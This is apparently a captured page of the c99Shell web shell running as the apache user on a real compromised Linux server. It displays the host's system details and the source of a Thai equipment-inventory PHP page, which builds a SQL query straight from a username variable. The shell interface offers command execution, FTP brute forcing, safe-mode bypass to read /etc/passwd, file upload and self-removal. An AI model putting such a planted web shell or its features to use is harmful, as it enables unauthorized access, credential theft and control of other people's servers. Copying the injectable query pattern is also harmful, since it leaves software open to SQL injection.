!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AddAccName.php (8.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start
();
 if (
session_is_registered("valid_user")&&session_is_registered("Priority") )
 {
include(
"../include/FunctionDB.php");
include(
"admin_menu.php");
include(
"../include/Function.php");
 
ConnectDB();
  
$sql ="SELECT * FROM personal_tb WHERE Username='$Username'";
  
$result mysql_query($sql) or die("Cannot Select").mysql_error();
  
$rs mysql_fetch_array($result);
  
$rs[Research_code] = mysql_insert_id();
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<script language="JavaScript" type="text/JavaScript">
<!--
  function browse()
{
form1.Imag1.src = form1.Img1.value;
}
<!--
 function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
function chk(c){
if (c.checked){
document.all.Prob1.disabled=false;
document.all.Prob2.disabled=false;
document.all.Prob3.disabled=false;
document.all.Prob4.disabled=false;
}
else{
document.all.Problem.disabled=false;
}
}
</script>
<p>&nbsp;</p>
<table width="791" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td ><fieldset>
          <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_manage.php">หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="AccByname.php?Faculty_code=<?php echo $Faculty_code ?>">ข้อมูลครุภัณฑ์หน่วยงาน</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"> <a href="EditAccList.php?Faculty_code=<?php echo $Faculty_code;?>">แก้ไขรายการครุภัณฑ์</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"> เพิ่มรายการครุภัณฑ์หน่วยงาน</font></legend>
            <label>
        <div align="left"><br>
              
              
          <form action="InsertAcc.php" method="post" enctype="multipart/form-data" name="form1" id="form1">
            <table width="555" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#D2F49F">
              <tr>
                <th height="25" colspan="3" scope="col">&nbsp;</th>
              </tr>
              <tr>
                <th width="165" height="30" scope="col"><div align="left"><font size="2" face="Tahoma">รหัส</font></div></th>
                <th width="13" scope="col">&nbsp;</th>
                <th width="361" scope="col"><div align="left"><font color="#006633" size="2" face="Tahoma">
                  <input name="Acc_code" type="text" id="Acc_code" size="30" />
                </font></div></th>
              </tr>
              <tr>
                <td><font size="2" face="Tahoma"><strong>ชื่ออุปกรณ์/ยี่ห้อ</strong></font></td>
                <td>&nbsp;</td>
                <td><input name="Acc_name" type="text" id="Acc_name" size="50" /></td>
              </tr>
              <tr>
                <td height="32"><font size="2" face="Tahoma"><strong>ชนิด</strong></font></td>
                <td>&nbsp;</td>
                <td><select name="Acc_type_code" id="Acc_type_code" class="input1">
                  <option></option>
                  <?php
               $strSQL1 
"SELECT * FROM accessories_type_tb ";
            
$result1 mysql_query($strSQL1);
                 while( 
$rs1 mysql_fetch_array($result1))
                {
                echo
"<option value=\"$rs1[Acc_type_code]\" ><b>$rs1[Acc_type]- $rs1[Acc_Etype]</b></option>\n";
                }
               
            
?>
                </select></td>
              </tr>
              <tr>
                <td><font size="2" face="Tahoma"><strong>หน่วยงาน /ฝ่ายที่รับผิดชอบ</strong></font></td>
                <td>&nbsp;</td>
                <td><strong><font color="#003366" size="2" face="Tahoma">
                  <select name="Faculty_code" id="Faculty_code" class="d">
                    <?php
           $strSQL3 
"SELECT * FROM  faculty_tb  ";
           
$result3 mysql_query($strSQL3);
                 while( 
$rs3 mysql_fetch_array($result3))     
                     {
                 echo
"<option value=\"$rs3[Faculty_code]\" ><b>$rs3[Faculty_name]</b></option>\n";
                }
                
CloseDB();  
                
          
?>
                  </select>
                </font></strong></td>
              </tr>
              <tr>
                <td height="31"><font size="2" face="Tahoma"><strong>ที่จัดเก็บ</strong></font></td>
                <td>&nbsp;</td>
                <td><input name="Store" type="text" class="input" id="Store" size="-จ" /></td>
              </tr>
              <tr>
                <td height="92"><div align="left"><font size="2" face="Tahoma"><strong>บริษัท Contact</strong></font></div>
                <div align="left"></div></td>
                <td>&nbsp;</td>
                <td><textarea name="Contact" cols="40" rows="5" id="Contact"></textarea></td>
              </tr>
              <tr>
                <td height="30"><font size="2" face="Tahoma"><strong>วันที่</strong></font></td>
                <td>&nbsp;</td>
                <td><font color="#000000" size="2" face="Tahoma">วันที่
                    <select name="mDate" id="mDate" class="select" onkeypress="return handleEnter(this, event)" >
                      <? getDay1to31();?>
                    </select>
เดือน
<select name="mMonth" id="mMonth" class="select" onkeypress="return handleEnter(this, event)">
  <? getThaiMonth();?>
</select>
ปี พ.ศ.
<input name="mYear" type="text" class="input" id="mYear" size="4" maxlength="4">
                </font></td>
              </tr>
              <tr>
                <td height="32"><div align="left"><font size="2" face="Tahoma"><strong>ราคา</strong></font></div></td>
                <td>&nbsp;</td>
                <td><input name="Price" type="text" class="input" id="Price" size="7" maxlength="8" />
                    <font size="2" face="Tahoma">บาท</font></td>
              </tr>
              <tr>
                <td><div align="left"><font size="2" face="Tahoma"> <strong>สถานะการใช้งาน</strong></font></div></td>
                <td><font color="#FF0000" size="4" face="Tahoma"><strong>*</strong></font></td>
                <td><font size="2" face="Tahoma">
                  <input type="radio" name="Status" value="ใช้งาน" />
                  ใช้งาน
  <input type="radio" name="Status" value="ว่าง" />
                  ว่าง
  <input type="radio" name="Status" value="ชำรุด" />
                  ชำรุด
  <input type="radio" name="Status" value="จำหน่ายออก" />
                  จำหน่ายออก </font></td>
              </tr>
              <tr>
                <td height="43"><div align="left"><font size="2" face="Tahoma"><strong>สถิติการใช้งาน</strong></font> </div></td>
                <td>&nbsp;</td>
                <td><textarea name="Statistic" cols="40" id="Statistic"></textarea></td>
              </tr>
              <tr>
                <td height="75"><div align="left"><font size="2" face="Tahoma"><strong>ประวัติการซ่อม</strong></font></div></td>
                <td>&nbsp;</td>
                <td><font size="2" face="Tahoma">
                  <textarea name="Fix_History" cols="40" rows="4" id="Fix_History"></textarea>
                </font></td>
              </tr>
              <tr>
                <td height="56"><div align="left"><font color="#003366" size="2" face="Tahoma"><strong>รูปภาพ</strong></font></div></td>
                <td>&nbsp;</td>
                <td><table width="23%" height="76" border="0" align="center" cellpadding="0" cellspacing="0">
                  <tr>
                    <td width="1%"><td width="49%" height="49"></td>
                    <td width="8%"><div align="center"></td>
                    <td width="8%"><td><td width="1%"><label><td width="3%"><input name="Img1" type="file" id="Img1" onchange="browse()" />
                    <td width="1%"><td width="12%"></td>
                    <div align="center"><img src=" " name="Imag1" width="109" height="94" id="Imag1" /></div>
                    <td width="17%">&nbsp;</td>
                  </tr>
                </table>
                <div align="left"></div></td>
              </tr>
            </table>
            <p align="center">
              <input type="submit" name="add" value="บันทึก"  onclick="return(checkFormat())" />
              &nbsp;&nbsp;&nbsp;
              <input type="reset" name="clear" value="เคลียร์ข้อมูล" />&nbsp;&nbsp;&nbsp;
               <input type="button" name="cancel" value="ยกเลิก" onclick="location.href = 'showStudent.php?programId=<?php //echo $programId;?>&amp;admitAcadYear=<?php //echo $admitAcadYear;?>'" />
            </p>
          </form>
        </div>
            </label>
        </fieldset><br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อหลักสูตรเพื่อสมัครเรียนของนักศึกษาในหลักสูตร<br>
      </font></td>
    </tr>
</table>
<?php 
    
}
else
{
       echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo
"Please Login ";
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0111 ]--